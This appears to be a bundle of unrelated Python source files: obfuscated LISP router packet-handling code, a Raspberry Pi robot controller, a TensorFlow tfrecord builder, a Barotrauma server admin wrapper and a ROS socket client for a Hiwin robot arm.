if ( II1Ii1iI1i in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( i1IIii11i1I1 [ 0 ] ,
False )
if ( II11 == "" ) : break
if 52 - 52: OoO0O00 * OoooooooOO
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
o0OO0oooo = lisp . lisp_parse_packet ( i1IIii11i1I1 , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 40 - 40: I1Ii111 - OoOoOO00 * I11i - IiII / OoOoOO00
if 71 - 71: oO0o / OoooooooOO % IiII / OoOoOO00 % I1Ii111
if 19 - 19: I1Ii111 + IiII / oO0o / II111iiii
if 92 - 92: i1IIi % ooOoO0o + ooOoO0o - iIii1I11I1II1 . Ii1I
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if ( o0OO0oooo ) :
I11iiI11iiI = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( 0 , I11iiI11iiI )
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
if 85 - 85: iIii1I11I1II1 . II111iiii
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if ( oO0oIIII in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( oO0oIIII , True )
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if ( II11 == "" ) : break
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if ( O00OoOoO == "command" ) :
if ( ii11iO000oo00OOOOO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 94 - 94: i1IIi
if ( ii11iO000oo00OOOOO . find ( "nonce%" ) != - 1 ) :
iIII11I1I1II ( ii11iO000oo00OOOOO )
continue
if 36 - 36: I1IiiI + Oo0Ooo
lispconfig . lisp_process_command ( oO0oIIII , O00OoOoO ,
ii11iO000oo00OOOOO , "lisp-itr" , [ I1IiII1I1i1I1 ] )
elif ( O00OoOoO == "api" ) :
lisp . lisp_process_api ( "lisp-itr" , oO0oIIII , ii11iO000oo00OOOOO )
elif ( O00OoOoO == "data-packet" ) :
O0oOo00o0 ( ii11iO000oo00OOOOO , "ipc" )
else :
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe request, using pcap" )
continue
if 46 - 46: iII111i
lisp . lisp_parse_packet ( II1iII1i , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
II1Ii11I111I ( )
lisp . lisp_print_banner ( "ITR normal exit" )
exit ( 0 )
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
simple_rp_main.py | import argparse
import os
import socket
import threading
import time
import traceback
import RPi.GPIO as GPIO
# start pigpiod service
# os.system('sudo pigpiod')
import pigpio
from fuzzy_system.simple_fuzzy_system import SimpleFuzzySystem
from misc.connection_helper import ConnectionHelper
from misc.motor_controller import QuadMotorController
from misc.range_sensor import UltraSonicSensors
# init controllers
motor_controller = QuadMotorController()
fuzzy_system = None
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pi = pigpio.pi()
r_range_sensors_pins = {
# R
(23, 24),
(23, 22),
(23, 27),
}
f_range_sensors_pins = {
# F
(23, 17),
(23, 4),
}
l_range_sensors_pins = {
# L
(23, 18),
(23, 25),
(23, 12),
}
run = 'Running'
STOP = 'Stopped'
MANUAL = 'Manual'
status = run
# Simulation Timer
sim_time = 60.0
goal_threshold = 0.5
# x , y , theta
# robot position and orientation
x, y, theta = 0, 0, 0
# target position and orientation
x_d, y_d, theta_d = 2, 0, 0
# range sensor value
dl = 2.2
df = 2.2
dr = 2.2
angle = 0
u, w = 10, 0
motor_status = STOP
first_time = True
# calculations precision
degree = 2
def range_updater():
global dl, df, dr, status
print('range Sensor thread is running')
# init range sensors
l_range_sensors = UltraSonicSensors(pi, l_range_sensors_pins)
f_range_sensors = UltraSonicSensors(pi, f_range_sensors_pins)
r_range_sensors = UltraSonicSensors(pi, r_range_sensors_pins)
while status == run:
try:
dl = l_range_sensors.update()
dl = round(dl * 0.5, 2)
df = f_range_sensors.update()
df = round(df * 0.5, 2)
dr = r_range_sensors.update()
dr = round(dr * 0.5, 2)
time.sleep(0.2)
except Exception as e:
print(e)
print(traceback.format_exc())
l_range_sensors.cancel()
f_range_sensors.cancel()
r_range_sensors.cancel()
pi.stop()
status = STOP
break
print('range Sensor thread is stopped')
def reverse(m_speed=None):
global motor_controller, motor_status
try:
motor_controller.move_backward(back_speed=m_speed)
# setLEDs(1, 0, 0, 1)
# print('straight')
except Exception as e:
motor_controller = QuadMotorController()
print(e)
print(traceback.format_exc())
def forwards(m_speed=None):
global motor_controller, motor_status
try:
print('forward')
motor_controller.move_forward(forward_speed=m_speed)
except Exception as e:
motor_controller = QuadMotorController()
print(e)
print(traceback.format_exc())
def turnright(m_speed=None):
global motor_controller, motor_status
try:
print('right')
motor_controller.move_right(right_speed=m_speed)
except Exception as e:
motor_controller = QuadMotorController()
print(e)
print(traceback.format_exc())
def turnleft(m_speed=None):
global motor_controller, motor_status
try:
print('left')
motor_controller.move_left(left_speed=m_speed)
except Exception as e:
motor_controller = QuadMotorController()
print(e)
print(traceback.format_exc())
def stopall(force=False):
global motor_controller, motor_status
try:
if force:
motor_controller.stopall()
else:
motor_controller.move_left(left_speed=0)
motor_status = 'stop'
except Exception as e:
motor_controller = QuadMotorController()
print(e)
print(traceback.format_exc())
# Helper Functions
def map(value, istart, istop, ostart, ostop):
return ostart + (ostop - ostart) * ((value - istart) / (istop - istart))
def do_fuzzy():
global dl, df, dr, status, u, angle
print('Fuzzy system is activated')
while status == run:
try:
front, left, right, velocity = df, dl, dr, u
front = min(max(front, 0), 70)
left = min(max(left, 0), 70)
right = min(max(right, 0), 70)
print(f'front : {front},left:{left},right:{right}')
values = {
"front": front,
"left": left,
"right": right,
"velocity": velocity
}
u, angle = fuzzy_system.run(values)
except Exception as e:
print(e)
print(traceback.format_exc())
status = STOP
break
print('Fuzzy system is Deactivated')
def update_data():
global socket, dl, df, dr, u, angle, first_time
if first_time:
message = {
"method": 'simple'
}
ConnectionHelper.send_json(socket, message)
ConnectionHelper.receive_json(socket)
first_time = False
# take sensors current value
current_dl = dl
current_df = df
current_dr = dr
current_dl = round(current_dl, degree)
current_df = round(current_df, degree)
current_dr = round(current_dr, degree)
print(f"dl : {current_dl} df : {current_df} dr : {current_dr} velocity:{u}")
message = {
"dl": current_dl,
"df": current_df,
"dr": current_dr,
"velocity": u
}
ConnectionHelper.send_json(socket, message)
result = ConnectionHelper.receive_json(socket)
print("Got >>", result)
u = result["velocity"]
angle = result["angle"]
fb_speed = 0
lr_speed = 0
def auto_movement():
global status, lr_speed
print('auto movement thread is running')
prev_u = -1
while status == run:
try:
# communicate with server
if use_server:
update_data()
if angle is not None and angle != 0 and abs(angle) > 25:
degree_per_second = 375
lr_speed = round(abs(angle / degree_per_second), 2)
print('LR {} '.format(lr_speed))
if angle > 0:
turnleft(100)
elif angle < 0:
turnright(100)
time.sleep(lr_speed)
stopall()
continue
if u is not None and u != 0:
forwards(u)
time.sleep(0.3)
stopall()
except Exception as e:
print(e)
print(traceback.format_exc())
stopall()
break
print('Robot Stopped')
time.sleep(0.5)
status = STOP
def print_status():
while status == run:
os.system('clear')
print('******************************')
print('lr speed is : {}\nfb speed is : {} '.format(angle, u))
print('******************************')
print('Distance L:{} F:{} R:{}'.format(dl, df, dr))
print('******************************')
time.sleep(0.3)
def simulation_timer():
global status, sim_time
print('simulation timer has started')
if sim_time != -1:
end = time.time() + sim_time
while time.time() < end and status == run:
time.sleep(1)
status = STOP
time.sleep(2)
print('simulation timer has stopped')
use_server = True
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser()
parser.add_argument('--host', type=str,
default='')
parser.add_argument('--port', type=int,
default=8888)
arguments = parser.parse_args()
use_server = arguments.host != ''
if use_server:
try:
socket.connect((arguments.host, arguments.port))
print('connected to server ' + arguments.host + ':' + str(arguments.port))
except Exception as e:
print(e)
print(traceback.format_exc())
status = STOP
else:
print('initializing Fuzzy System')
fuzzy_system = SimpleFuzzySystem()
print('Fuzzy System initialized')
fuzzy_thread = threading.Thread(target=do_fuzzy)
range_sensor_thread = threading.Thread(target=range_updater)
auto_movement_thread = threading.Thread(target=auto_movement)
simulation_timer_thread = threading.Thread(target=simulation_timer)
print_thread = threading.Thread(target=print_status)
range_sensor_thread.start()
time.sleep(1)
print_thread.start()
simulation_timer_thread.start()
auto_movement_thread.start()
if not use_server:
fuzzy_thread.start()
fuzzy_thread.join()
# Join Threads to Stop together
# movement_thread.join()
range_sensor_thread.join()
auto_movement_thread.join()
simulation_timer_thread.join()
print_thread.join()
finally:
# Force STOP MOTORS
stopall(force=True)
GPIO.cleanup()
|
create_tfrecords.py | """
Create the tfrecord files for a dataset.
A lot of this code comes from the tensorflow inception example, so here is their license:
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from datetime import datetime
import hashlib
import json
import os
from queue import Queue
import random
import sys
import threading
import numpy as np
import tensorflow as tf
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _validate_text(text):
"""If text is not str or unicode, then try to convert it to str."""
if isinstance(text, str):
return text.encode('utf-8')
elif isinstance(text, unicode):
return text.encode('utf-8', 'ignore')
else:
return text.encode('utf-8','ignore')
def _convert_to_example(image_example, image_buffer, height, width, colorspace=b'RGB',
channels=3, image_format=b'JPEG'):
"""Build an Example proto for an example.
Args:
image_example: dict, an image example
image_buffer: string, JPEG encoding of RGB image
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
# Required
filename = str(image_example['filename'])
image_id = str(image_example['id'])
# Class label for the whole image
image_class = image_example.get('class', {})
class_label = image_class.get('label', 0)
class_text = _validate_text(image_class.get('text', ''))
class_conf = image_class.get('conf', 1.)
# Objects
image_objects = image_example.get('object', {})
object_count = image_objects.get('count', 0)
# Bounding Boxes
image_bboxes = image_objects.get('bbox', {})
xmin = image_bboxes.get('xmin', [])
xmax = image_bboxes.get('xmax', [])
ymin = image_bboxes.get('ymin', [])
ymax = image_bboxes.get('ymax', [])
bbox_scores = image_bboxes.get('score', [])
bbox_labels = image_bboxes.get('label', [])
bbox_text = list(map(_validate_text, image_bboxes.get('text', [])))
bbox_label_confs = image_bboxes.get('conf', [])
# Parts
image_parts = image_objects.get('parts', {})
parts_x = image_parts.get('x', [])
parts_y = image_parts.get('y', [])
parts_v = image_parts.get('v', [])
parts_s = image_parts.get('score', [])
# Areas
object_areas = image_objects.get('area', [])
# Ids
object_ids = list(map(str, image_objects.get('id', [])))
# Any extra data (e.g. stringified json)
extra_info = str(image_class.get('extra', ''))
# Additional fields for the format needed by the Object Detection repository
key = hashlib.sha256(image_buffer).hexdigest()
is_crowd = image_objects.get('is_crowd', [])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(tf.compat.as_bytes(filename)),
'image/id': _bytes_feature(tf.compat.as_bytes(image_id)),
'image/encoded': _bytes_feature(image_buffer),
'image/extra': _bytes_feature(tf.compat.as_bytes(extra_info)),
'image/class/label': _int64_feature(class_label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(class_text)),
'image/class/conf': _float_feature(class_conf),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(bbox_labels),
'image/object/bbox/text': _bytes_feature(bbox_text),
'image/object/bbox/conf': _float_feature(bbox_label_confs),
'image/object/bbox/score' : _float_feature(bbox_scores),
'image/object/parts/x' : _float_feature(parts_x),
'image/object/parts/y' : _float_feature(parts_y),
'image/object/parts/v' : _int64_feature(parts_v),
'image/object/parts/score' : _float_feature(parts_s),
'image/object/count' : _int64_feature(object_count),
'image/object/area' : _float_feature(object_areas),
'image/object/id' : _bytes_feature(object_ids),
# Additional fields for the format needed by the Object Detection repository
'image/source_id': _bytes_feature(tf.compat.as_bytes(image_id)),
'image/key/sha256': _bytes_feature(tf.compat.as_bytes(key)),
'image/object/class/label': _int64_feature(bbox_labels),
'image/object/class/text': _bytes_feature(bbox_text),
'image/object/is_crowd': _int64_feature(is_crowd)
}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
# Convert the image data from png to jpg
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
# Decode the image data as a jpeg image
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3, "JPEG needs to have height x width x channels"
assert image.shape[2] == 3, "JPEG needs to have 3 channels (RGB)"
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
_, file_extension = os.path.splitext(filename)
return file_extension.lower() == '.png'
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read()
# Clean the dirty data.
if _is_png(filename):
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, output_directory,
dataset, num_shards, store_images, error_queue):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set (e.g. `train` or `test`)
output_directory: string, file path to store the tfrecord files.
dataset: list, a list of image example dicts
num_shards: integer number of shards for this data set.
store_images: bool, should the image be stored in the tfrecord
error_queue: Queue, a queue to place image examples that failed.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
error_counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d.tfrecords' % (name, shard, num_shards)
output_file = os.path.join(output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
image_example = dataset[i]
filename = str(image_example['filename'])
try:
if store_images:
if 'encoded' in image_example:
image_buffer = image_example['encoded']
height = image_example['height']
width = image_example['width']
colorspace = image_example['colorspace']
image_format = image_example['format']
num_channels = image_example['channels']
example = _convert_to_example(image_example, image_buffer, height,
width, colorspace, num_channels,
image_format)
else:
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(image_example, image_buffer, height,
width)
else:
image_buffer=''
height = int(image_example['height'])
width = int(image_example['width'])
example = _convert_to_example(image_example, image_buffer, height,
width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
except Exception as e:
raise
error_counter += 1
error_msg = repr(e)
image_example['error_msg'] = error_msg
error_queue.put(image_example)
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s, with %d errors.' %
(datetime.now(), thread_index, shard_counter, output_file, error_counter))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
def create(dataset, dataset_name, output_directory, num_shards, num_threads, shuffle=True, store_images=True):
"""Create the tfrecord files to be used to train or test a model.
Args:
dataset : [{
"filename" : <REQUIRED: path to the image file>,
"id" : <REQUIRED: id of the image>,
"class" : {
"label" : <[0, num_classes)>,
"text" : <text description of class>
},
"object" : {
"bbox" : {
"xmin" : [],
"xmax" : [],
"ymin" : [],
"ymax" : [],
"label" : []
}
}
}]
dataset_name: a name for the dataset
output_directory: path to a directory to write the tfrecord files
num_shards: the number of tfrecord files to create
num_threads: the number of threads to use
shuffle : bool, should the image examples be shuffled or not prior to creating the tfrecords.
Returns:
list : a list of image examples that failed to process.
"""
# Images in the tfrecords set must be shuffled properly
if shuffle:
random.shuffle(dataset)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(dataset), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
# A Queue to hold the image examples that fail to process.
error_queue = Queue()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, dataset_name, output_directory, dataset,
num_shards, store_images, error_queue)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(dataset)))
# Collect the errors
errors = []
while not error_queue.empty():
errors.append(error_queue.get())
print ('%d examples failed.' % (len(errors),))
return errors
def parse_args():
parser = argparse.ArgumentParser(description='Basic statistics on tfrecord files')
parser.add_argument('--dataset_path', dest='dataset_path',
help='Path to the dataset json file.', type=str,
required=True)
parser.add_argument('--prefix', dest='dataset_name',
help='Prefix for the tfrecords (e.g. `train`, `test`, `val`).', type=str,
required=True)
parser.add_argument('--output_dir', dest='output_dir',
help='Directory for the tfrecords.', type=str,
required=True)
parser.add_argument('--shards', dest='num_shards',
help='Number of shards to make.', type=int,
required=True)
parser.add_argument('--threads', dest='num_threads',
help='Number of threads to make.', type=int,
required=True)
parser.add_argument('--shuffle', dest='shuffle',
help='Shuffle the records before saving them.',
required=False, action='store_true', default=False)
parser.add_argument('--store_images', dest='store_images',
help='Store the images in the tfrecords.',
required=False, action='store_true', default=False)
parsed_args = parser.parse_args()
return parsed_args
def main():
args = parse_args()
with open(args.dataset_path) as f:
dataset = json.load(f)
errors = create(
dataset=dataset,
dataset_name=args.dataset_name,
output_directory=args.output_dir,
num_shards=args.num_shards,
num_threads=args.num_threads,
shuffle=args.shuffle,
store_images=args.store_images
)
return errors
if __name__ == '__main__':
main()
|
__init__.py | import time
import socket
import sys
import os
from threading import Thread
class Barotrauma:
def __init__(self, stdinpath, udspath, writetimeout=0.1, responsetime=0.1, buffersize=128):
self.stdinpath = stdinpath
self.udspath = udspath
self.writetimeout = writetimeout
self.responsetime = 0.3
self.udsbuffer = Udsbuffer(size = buffersize)
self.__start_uds_thread()
def __uds_thread(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(self.udspath)
except Exception as error:
raise Exception("Error connecting to unix domain socket: " + repr(error))
while True:
data = ""
while True: # Recieve exactly one line of data
data = data + sock.recv(1).decode()
if data.endswith("\n"):
break
self.udsbuffer.add(data.strip("\n"))
def __start_uds_thread(self):
thread = Thread(target=self.__uds_thread)
thread.start()
def send_command(self, command, args=[], followup=[]):
try:
with open(self.stdinpath, "w") as file:
file.write(command + " ".join(args))
for string in followup:
time.sleep(self.writetimeout)
file.write(string)
except Exception as error:
raise Exception("Error on writing to pipefile: " + repr(error))
def response(self, command, args=[]):
self.udsbuffer.flush()
self.send_command(command, args)
time.sleep(self.responsetime)
response = self.udsbuffer.buffer
index = [i for i, s in enumerate(response) if command in s][0] #Get index of command in game output
response = response[index+1:] #trim buffer array so that its only text after the command in game output
return response
def ban_name(self, name, reason, duration):
self.send_command("ban", [name], [reason, duration])
def ban_ip(self, ip, reason, duration):
self.send_command("banip", [ip], [reason, duration])
def get_players(self):
responses = self.response("clientlist")
responses = [i for i in responses if i.startswith("-")]
clients = []
for response in responses:
response = response[2:]
if(response.find("playing") == -1):
name = response[response.find(":")+2:response.rfind(",")]
else:
name = response[response.find(":")+2:response.find("playing")-1]
id = response[:response.find(":")]
ip = response[response.rfind(",")+2:].strip()
clients.append(Player(self, name, id, ip))
return clients
def get_player_by_name(self, name): #returns -1 if a client cant be found
clients = self.get_players()
for client in clients:
if client.name.lower() == name.lower():
return client
return -1
def get_player_by_ip(self, ip): #same as above
clients = self.get_players()
for client in clients:
if client.ip == ip:
return ip
return -1
def get_player_by_id(self, id): #Id must be a string
clients = self.get_players()
for client in clients:
if client.id == id:
return client
return -1
class Udsbuffer: #Holds the buffer for incoming lines of data from the game server
def __init__(self, size=128):
self.buffer = []
self.size = size
def add(self, data): #Please use this function insteada of udsbuffer.append.(Data) as this function limits the size of the list
self.buffer.append(data)
if len(self.buffer) > self.size:
del self.buffer[self.size:]
def flush(self):
self.buffer.clear()
class Player:
def __init__(self, barotrauma, name, id, ip):
self.name = name
self.id = id
self.ip = ip
self.barotrauma = barotrauma
def ban_name(self, reason, duration):
barotrauma.ban_name(self.name, reason, duration)
def ban_ip(self, reason, duration):
barotrauma.ban_name(self.ip, reason, duration)
def give_rank(self, rank):
barotrauma.send_command(give_rank, [id], [rank])
def give_permission(self, permission):
barotrauma.send_command(give_rank, [id], [permission])
|
HiwinRA605_socket_ros_test_20190625195259.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,point_data_flag,arm_mode_flag,speed_mode_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
